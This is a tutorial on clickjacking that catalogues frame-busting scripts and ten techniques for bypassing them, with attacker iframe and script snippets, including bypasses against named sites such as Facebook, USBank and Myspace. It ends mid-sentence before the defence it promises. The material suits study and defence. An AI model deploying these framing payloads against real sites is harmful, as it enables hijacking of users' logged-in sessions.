Busting Frame Busting
Before busting frame busting, here are some commonly used frame-busting code fragments. The conditional checks:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length>0)
if((self.parent&&!(self.parent===self))&&(self.parent.frames.length!=0))
+ (combined with one of the following counter-actions)
top.location = self.location
top.location.href = document.location.href
top.location.href = self.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write()
top.location = location
top.location.replace(document.location)
top.location.replace(URL)
top.location.href = document.location
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
top.location.href = self.location
top.location = window.location
top.location.replace(window.location.pathname)
window.top.location = window.self.location
setTimeout(function(){document.body.innerHTML='';},1);
window.self.onload = function(evt){document.body.innerHTML='';}
var url = window.location.href; top.location.replace(url)
Now that we know some common frame-busting code, here is how busting frame busting works.
Ten common ways of busting frame busting
1 Double framing
Victim frame busting code:
if(top.location!=self.location){
parent.location=self.location;
}
Attacker top frame:
<iframe src="attacker2.html">
Attacker sub-frame:
<iframe src="http://www.victim.com">
2 The onBeforeUnload event
<script>
window.onbeforeunload=function()
{
return "Asking the user nicely";
}
</script>
<iframe src="http://www.paypal.com">
3 onBeforeUnload ---204 Flushing
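// counter incremented every time the framed page tries to navigate away
var kill_bust=0
window.onbeforeunload=
function(){kill_bust++}
setInterval(function(){
if(kill_bust>0){
kill_bust-=2;
// redirect to a server that answers 204 No Content
window.top.location=
'http://no-content-204.com'
}
},1);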
<iframe src="http://www.victim.com">
4 Exploiting the XSS filter
IE8:
Example. Victim frame busting code:
<script>
if(top!=self){
top.location=self.location;
}
</script>
Attacker:
<iframe src="http://www.victim.com/?v=<script>if>
Google Chrome:
Example. victim frame busting code:
if(top!=self){
top.location=self.location;
}
Attacker:
<iframe src="http://www.victim.com/?v=if(top+!%3D+self)+%7B+top.location%3Dself.location%3B+%7D">
5 Referrer checking problems
Consider the following code from a large retailer:
if(top.location!=location){
if(document.referrer&&document.referrer.indexOf("walmart.com")==-1)
{
top.location.replace(document.location.href);
}
}
This page can be framed by an attacker who controls a domain walmart.com.badgy.com.
6 Clobbering top.location
IE7.
Victim frame busting code:
if(top.location!=self.location){
top.location=self.location;
}
Attacker:
<script>var location="clobbered";</script>
<iframe src="http://www.victim.com">
7 IE Restricted Zone
Attacker:
<iframe src="http://www.victim.com" security="restricted"></iframe>
8 Sandbox attribute
This feature can be used to disable JavaScript in the same way as the restricted zone; however, because cookies are delivered in the subframe, clickjacking attacks can take advantage of existing sessions that the user has established.
9 Design mode
Stone [Next generation clickjacking] showed that design mode can be turned on in the framing page (via document.designMode), disabling JavaScript in top and sub-frame. Again, cookies are delivered to the sub-frame. Design mode is currently implemented in Firefox and IE8.
10 Mobile Sites
Unfortunately, most sites that framebust on their primary domain do not framebust their mobile sites. To make matters worse, many sites do not differentiate sessions between the regular and the mobile site; that is, if you are logged in at www.example.com you are also logged in at mobile.example.com. This enables the attacker to clickjack the mobile site (on a desktop browser) and gain control of a fully functional site.
In real-world network environments, busting frame busting is more complicated.
1 Facebook.com ---Shedding a Ray of Light in the Darkness
frame-busting code:
if(top!=self){
// when framed, cover the page with a dark overlay that busts out on click
window.document.write("<div style='"+
"background:black;opacity:0.5;"+
"filter:alpha(opacity=50);"+
"position:absolute;top:0px;left:0px;"+
"width:9999px;height:9999px;"+
"z-index:1000001' "+
"onClick='top.location.href=window.location.href'>"+
"</div>");
}
Busting Frame Busting:
<body style="overflow-x:hidden; border:0px; margin:0px;">
<iframe width="21800px" height="2500px" src="http://facebook.com/" frameborder="0" marginheight="0" marginwidth="0"></iframe>
<script>window.scrollTo(10200,0);</script>
2 www.USBank.com----Domain checking errors
frame-busting code:
if(self!=top){
var dom=getDom(document.referrer);
var okDom=/usbank|localhost|usbnet/; // unanchored: matches anywhere in the domain
var matchDomain=dom.search(okDom);
if(matchDomain==-1){/* bust */}
}
www.husbanken.no and http://www.rusbank.org will be allowed to frame the page, since both contain the string usbank in the domain.
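The substring check from "Referrer checking problems" and the unanchored regex from the USBank case, set beside a hostname allowlist that matches on label boundaries. This is an added example, not code from the original page or from the sites discussed; the function names and allowlist values are assumptions, and the sample referrers are constructed from the hostnames named above.

```javascript
// Added example (hypothetical helpers): weak referrer checks vs. a strict allowlist.

// Weak, as in the retailer snippet: substring anywhere in the referrer string.
function weakIndexOfCheck(referrer, needle) {
  return referrer.indexOf(needle) !== -1;
}

// Weak, as in the bank snippet: unanchored regex searched over the referrer host.
function weakRegexCheck(referrer, pattern) {
  let host;
  try { host = new URL(referrer).hostname; } catch (e) { return false; }
  return host.search(pattern) !== -1;
}

// Strict: parse the referrer, require http(s), then accept only an exact
// allowlisted host or a true subdomain of one (suffix match on a dot boundary).
function strictReferrerCheck(referrer, allowedDomains) {
  let url;
  try { url = new URL(referrer); } catch (e) { return false; } // empty or malformed
  if (url.protocol !== "https:" && url.protocol !== "http:") return false;
  const host = url.hostname.toLowerCase().replace(/\.$/, ""); // drop trailing dot
  return allowedDomains.some(function (d) {
    return host === d || host.endsWith("." + d);
  });
}

// Constructed sample referrers.
const samples = [
  "http://walmart.com.badgy.com/frame.html",
  "http://www.husbanken.no/",
  "http://www.rusbank.org/",
  "https://www.walmart.com/cart",
  "https://www.usbank.com/login",
  ""
];

// Evaluate every sample with the weak checks and with the strict check.
function report() {
  return samples.map(function (r) {
    return {
      referrer: r,
      weak: weakIndexOfCheck(r, "walmart.com") ||
            weakRegexCheck(r, /usbank|localhost|usbnet/),
      strict: strictReferrerCheck(r, ["walmart.com", "usbank.com"])
    };
  });
}
console.log(report());
```

The three look-alike hosts pass the weak checks and fail the strict one. A correct match still relies on the Referer header being present and on every allowlisted site refusing to be framed itself, which is the trust problem in the Myspace case.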
3 Myspace.com----Trust problems
frame-busting code:
try{
A=!top.location.href
}catch(B){}
A=A&&!(document.referrer.match(
/^https?:\/\/[-a-z0-9.]*\.google\.(co\.|com\.)?[a-z]+\/imgres/i))
&&!(document.referrer.match(
/^https?:\/\/([^\/]*\.)?(myspace\.com|myspace\.cn|simsidekick\.com|levisawards\.com)\//i));
if(A){/* framebust */}
By design, the code allows Myspace to be framed by Google Images. Google Images, however, does not use frame busting.
An attacker can frame Google Images and then cause Google Images to frame Myspace (e.g. by issuing a specific Google search query that leads to a Myspace page).
Both the defenses and the ways around them have been shown in the descriptions above. What follows is currently the most defensive